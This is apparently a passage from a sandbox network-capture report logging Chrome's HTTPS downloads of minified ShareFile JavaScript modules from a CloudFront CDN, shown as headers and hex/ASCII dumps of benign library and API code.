                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 92422
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Fri, 04 Oct 2024 12:21:20 GMT
                                                                                                                                                                                                                                                                                ETag: "5d7e959e6b83248d04c1764f8f6f153e"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 eab88762658052b4a1e386f8521a38ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: HMuVSJoG29zNmvvYHp4sxuCUDpLjR2bjkatBl6CSTOkyBCGtW195GA==
                                                                                                                                                                                                                                                                                Age: 45982
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 65 72 6d 69 73 73 69 6f 6e 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpermissionspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.definePr
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 63 65 54 6f 4d 69 73 73 69 6e 67 4b 65 79 26 26 28 79 3d 22 22 2e 63 6f 6e 63 61 74 28 66 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 63 29 29 2c 28 52 7c 7c 4c 29 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 26 26 28 79 3d 22 76 31 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 50 49 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 70 70 65 6e 64 4e 61 6d 65 73 70 61 63 65 54 6f 4d 69 73 73 69 6e 67 4b 65 79 3f 22 22 2e 63 6f 6e 63 61 74 28 66 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 63 29 3a 63 2c 4c 3f 79 3a 75 6e 64 65 66 69 6e 65 64 29 3a 74 68
                                                                                                                                                                                                                                                                                Data Ascii: ceToMissingKey&&(y="".concat(f,":").concat(c)),(R||L)&&this.options.parseMissingKeyHandler&&(y="v1"!==this.options.compatibilityAPI?this.options.parseMissingKeyHandler(this.options.appendNamespaceToMissingKey?"".concat(f,":").concat(c):c,L?y:undefined):th
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 73 61 66 65 56 61 6c 75 65 28 69 29 3b 69 66 28 65 3d 65 2e 72 65 70 6c 61 63 65 28 6f 5b 30 5d 2c 63 29 2c 70 3f 28 74 2e 72 65 67 65 78 2e 6c 61 73 74 49 6e 64 65 78 2b 3d 69 2e 6c 65 6e 67 74 68 2c 74 2e 72 65 67 65 78 2e 6c 61 73 74 49 6e 64 65 78 2d 3d 6f 5b 30 5d 2e 6c 65 6e 67 74 68 29 3a 74 2e 72 65 67 65 78 2e 6c 61 73 74 49 6e 64 65 78 3d 30 2c 2b 2b 61 3e 3d 73 2e 6d 61 78 52 65 70 6c 61 63 65 73 29 62 72 65 61 6b 7d 7d 29 29 2c 65 7d 7d 2c 7b 6b 65 79 3a 22 6e 65 73 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 3d 74 68 69 73 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                                                Data Ascii: safeValue(i);if(e=e.replace(o[0],c),p?(t.regex.lastIndex+=i.length,t.regex.lastIndex-=o[0].length):t.regex.lastIndex=0,++a>=s.maxReplaces)break}})),e}},{key:"nest",value:function(e,t){var n,r,o=this,i=arguments.length>2&&arguments[2]!==undefined?arguments
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15230INData Raw: 65 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 66 65 2c 72 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 6e 3d 65 29 2c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 73 6f 75 72 63 65 73 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 74 69 61 6c 42 75 6e 64 6c 65 64 4c 61 6e 67 75 61 67 65 73 29 7b 69 66 28 72 26 26 22 63 69 6d 6f 64 65 22 3d 3d 3d 72 2e 74 6f 4c 6f 77 65 72 43 61
                                                                                                                                                                                                                                                                                Data Ascii: es",value:function(e){var t=this,n=arguments.length>1&&arguments[1]!==undefined?arguments[1]:fe,r="string"==typeof e?e:this.language;if("function"==typeof e&&(n=e),!this.options.resources||this.options.partialBundledLanguages){if(r&&"cimode"===r.toLowerCa
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 63 74 69 6f 6e 20 4e 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 72 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65
                                                                                                                                                                                                                                                                                Data Ascii: ction Ne(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function Ze(e){for(var t=1;t<argume
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC11656INData Raw: 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 20 6d 65 74 68 6f 64 2e 22 29 7d 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 72 7d 29 7d 2c 34 39 32 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 72 65 74 75 72 6e 7b 7d 3b 76 61 72 20 6e 2c 72 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 72 65 74 75 72 6e 7b 7d 3b 76 61 72 20 6e 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 69 66 28 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 72 29 29 7b 69 66 28 74 2e 69 6e 63 6c 75 64
                                                                                                                                                                                                                                                                                Data Ascii: , non-array objects must have a [Symbol.iterator]() method.")}n.d(t,{Z:()=>r})},4925:(e,t,n)=>{"use strict";function r(e,t){if(null==e)return{};var n,r,o=function(e,t){if(null==e)return{};var n={};for(var r in e)if({}.hasOwnProperty.call(e,r)){if(t.includ


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                138192.168.2.64986613.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC425OUTGET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 133462
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 02 Oct 2024 18:05:42 GMT
                                                                                                                                                                                                                                                                                ETag: "339b13b91ce8cf7cad214117ea302b1f"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 2bbba694ff55d664208103e9c25dce14.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Pl-LIGAVqPhq37q5mCAReRN07d6a0MT-GBcyK-8BACH2m9c2YtVGUA==
                                                                                                                                                                                                                                                                                Age: 45982
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 79 6e 61 6d 69 63 66 6f 72 6d 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineP
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 6c 65 78 50 6f 73 69 74 69 76 65 3a 31 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 31 2c 66 6c 65 78 4e 65 67 61 74 69 76 65 3a 31 2c 66 6c 65 78 4f 72 64 65 72 3a 31 2c 67 72 69 64 52 6f 77 3a 31 2c 67 72 69 64 52 6f 77 45 6e 64 3a 31 2c 67 72 69 64 52 6f 77 53 70 61 6e 3a 31 2c 67 72 69 64 52 6f 77 53 74 61 72 74 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 45 6e 64 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 74 61 72 74 3a 31 2c 6d 73 47 72 69 64 52 6f 77 3a 31 2c 6d 73 47 72 69 64 52 6f 77 53 70 61 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 66 6f 6e 74 57 65 69 67 68 74 3a 31 2c 6c 69 6e 65 48 65 69 67 68 74
                                                                                                                                                                                                                                                                                Data Ascii: lexPositive:1,flexShrink:1,flexNegative:1,flexOrder:1,gridRow:1,gridRowEnd:1,gridRowSpan:1,gridRowStart:1,gridColumn:1,gridColumnEnd:1,gridColumnSpan:1,gridColumnStart:1,msGridRow:1,msGridRowSpan:1,msGridColumn:1,msGridColumnSpan:1,fontWeight:1,lineHeight
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 3a 22 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 70 72 6f 6a 65 63 74 73 20 77 69 74 68 20 65 6e 74 69 74 6c 65 6d 65 6e 74 73 22 7d 29 2c 63 3d 79 69 65 6c 64 20 73 2e 74 65 78 74 28 29 3b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 63 2c 77 29 7d 29 29 7d 2c 67 65 74 53 6f 72 74 65 64 50 72 6f 6a 65 63 74 73 42 79 43 6f 6e 74 61 69 6e 65 72 52 49 44 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 28 30 2c 6e 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 63 6f 6e 73 74 20 6e 3d 67 28 60 70 72 6f 6a 65 63 74 73 3f 63 6f 6e 74 61 69 6e 65 72 52 49 44 3d 24 7b 65 7d 26 73 6f 72 74 2e 66 69 65 6c 64 3d 24 7b 74 7d 26 73 6f 72 74 2e 64 69 72 65 63 74 69 6f 6e 3d 24 7b 72
                                                                                                                                                                                                                                                                                Data Ascii: :"Unable to get projects with entitlements"}),c=yield s.text();return JSON.parse(c,w)}))},getSortedProjectsByContainerRID(e,t,r){return(0,n.__awaiter)(this,void 0,void 0,(function*(){const n=g(`projects?containerRID=${e}&sort.field=${t}&sort.direction=${r
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 29 7b 74 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 63 6f 6e 73 74 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 6c 65 74 20 6e 2c 6f 3d 72 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 6f 2d 2d 20 3e 30 3b 29 69 66 28 6e 3d 72 5b 6f 5d 2c 74 3d 3d 3d 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 63 6f 6e 73 74 20 49 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 67 6c 6f 62 61 6c 2c 4c 3d 65 3d 3e 21 67 28 65 29
                                                                                                                                                                                                                                                                                Data Ascii: ){t=t.toLowerCase();const r=Object.keys(e);let n,o=r.length;for(;o-- >0;)if(n=r[o],t===n.toLowerCase())return n;return null}const I="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:"undefined"!=typeof window?window:global,L=e=>!g(e)
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 3d 3d 69 3b 29 64 2b 3d 72 5b 6c 2b 2b 5d 2c 6c 25 3d 65 3b 69 66 28 69 3d 28 69 2b 31 29 25 65 2c 69 3d 3d 3d 61 26 26 28 61 3d 28 61 2b 31 29 25 65 29 2c 63 2d 6f 3c 74 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 66 3d 75 26 26 63 2d 75 3b 72 65 74 75 72 6e 20 66 3f 4d 61 74 68 2e 72 6f 75 6e 64 28 31 65 33 2a 64 2f 66 29 3a 75 6e 64 65 66 69 6e 65 64 7d 7d 3b 63 6f 6e 73 74 20 24 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 72 2c 6e 2c 6f 3d 30 2c 69 3d 31 65 33 2f 74 3b 63 6f 6e 73 74 20 61 3d 28 74 2c 69 3d 44 61 74 65 2e 6e 6f 77 28 29 29 3d 3e 7b 6f 3d 69 2c 72 3d 6e 75 6c 6c 2c 6e 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 2c 6e 3d 6e 75 6c 6c 29 2c 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 3b 72 65 74 75 72 6e 5b 28
                                                                                                                                                                                                                                                                                Data Ascii: ==i;)d+=r[l++],l%=e;if(i=(i+1)%e,i===a&&(a=(a+1)%e),c-o<t)return;const f=u&&c-u;return f?Math.round(1e3*d/f):undefined}};const $e=function(e,t){let r,n,o=0,i=1e3/t;const a=(t,i=Date.now())=>{o=i,r=null,n&&(clearTimeout(n),n=null),e.apply(null,t)};return[(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 65 72 6e 61 6c 53 65 72 76 65 72 45 72 72 6f 72 3a 35 30 30 2c 4e 6f 74 49 6d 70 6c 65 6d 65 6e 74 65 64 3a 35 30 31 2c 42 61 64 47 61 74 65 77 61 79 3a 35 30 32 2c 53 65 72 76 69 63 65 55 6e 61 76 61 69 6c 61 62 6c 65 3a 35 30 33 2c 47 61 74 65 77 61 79 54 69 6d 65 6f 75 74 3a 35 30 34 2c 48 74 74 70 56 65 72 73 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3a 35 30 35 2c 56 61 72 69 61 6e 74 41 6c 73 6f 4e 65 67 6f 74 69 61 74 65 73 3a 35 30 36 2c 49 6e 73 75 66 66 69 63 69 65 6e 74 53 74 6f 72 61 67 65 3a 35 30 37 2c 4c 6f 6f 70 44 65 74 65 63 74 65 64 3a 35 30 38 2c 4e 6f 74 45 78 74 65 6e 64 65 64 3a 35 31 30 2c 4e 65 74 77 6f 72 6b 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 52 65 71 75 69 72 65 64 3a 35 31 31 7d 3b 4f 62 6a 65 63 74 2e 65 6e 74 72 69
                                                                                                                                                                                                                                                                                Data Ascii: ernalServerError:500,NotImplemented:501,BadGateway:502,ServiceUnavailable:503,GatewayTimeout:504,HttpVersionNotSupported:505,VariantAlsoNegotiates:506,InsufficientStorage:507,LoopDetected:508,NotExtended:510,NetworkAuthenticationRequired:511};Object.entri
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 72 29 3b 63 61 73 65 20 37 3a 74 68 72 6f 77 20 74 2e 70 72 65 76 3d 37 2c 74 2e 74 30 3d 74 5b 22 63 61 74 63 68 22 5d 28 30 29 2c 6e 65 77 20 45 72 72 6f 72 28 22 45 72 72 6f 72 20 72 65 73 74 6f 72 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 71 75 65 73 74 3a 20 22 2e 63 6f 6e 63 61 74 28 74 2e 74 30 29 29 3b 63 61 73 65 20 31 30 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 74 2e 73 74 6f 70 28 29 7d 7d 29 2c 74 2c 6e 75 6c 6c 2c 5b 5b 30 2c 37 5d 5d 29 7d 29 29 29 7d 2c 72 65 6d 69 6e 64 41 73 73 69 67 6e 65 65 73 49 6e 66 6f 72 6d 61 74 69 6f 6e 52 65 71 75 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 5f 5f 61 77 61 69 74 65 72 29 28 76 6f 69 64
                                                                                                                                                                                                                                                                                Data Ascii: brupt("return",r);case 7:throw t.prev=7,t.t0=t["catch"](0),new Error("Error restoring information request: ".concat(t.t0));case 10:case"end":return t.stop()}}),t,null,[[0,7]])})))},remindAssigneesInformationRequest:function(e,t){return(0,a.__awaiter)(void
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC13232INData Raw: 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 6e 3d 72 28 34 34 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68
                                                                                                                                                                                                                                                                                Data Ascii: (e,t,r)=>{"use strict";r.d(t,{A:()=>i});var n=r(4467);function o(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC5542INData Raw: 72 79 45 6e 74 72 69 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 74 3e 3d 30 3b 2d 2d 74 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 74 5d 3b 69 66 28 72 2e 66 69 6e 61 6c 6c 79 4c 6f 63 3d 3d 3d 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 28 72 2e 63 6f 6d 70 6c 65 74 69 6f 6e 2c 72 2e 61 66 74 65 72 4c 6f 63 29 2c 46 28 72 29 2c 79 7d 7d 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 74 3e 3d 30 3b 2d 2d 74 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 74 5d 3b 69 66 28 72 2e 74 72 79 4c 6f 63 3d 3d 3d 65 29 7b 76 61 72 20 6e 3d 72 2e 63 6f 6d 70 6c 65 74 69 6f 6e 3b
                                                                                                                                                                                                                                                                                Data Ascii: ryEntries.length-1;t>=0;--t){var r=this.tryEntries[t];if(r.finallyLoc===e)return this.complete(r.completion,r.afterLoc),F(r),y}},"catch":function(e){for(var t=this.tryEntries.length-1;t>=0;--t){var r=this.tryEntries[t];if(r.tryLoc===e){var n=r.completion;


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                139192.168.2.64986013.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC600OUTGET /sharefile-web/sharefiledev-view-user-pilet/1.8.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
